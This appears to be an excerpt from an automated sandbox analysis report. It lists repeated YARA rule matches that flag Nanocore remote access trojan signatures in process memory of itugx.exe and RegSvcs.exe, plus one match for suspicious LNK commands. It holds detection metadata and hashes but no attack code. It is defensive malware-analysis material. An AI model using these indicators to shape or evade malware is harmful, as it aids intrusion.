      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000001.00000003.359286205.00000000036B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
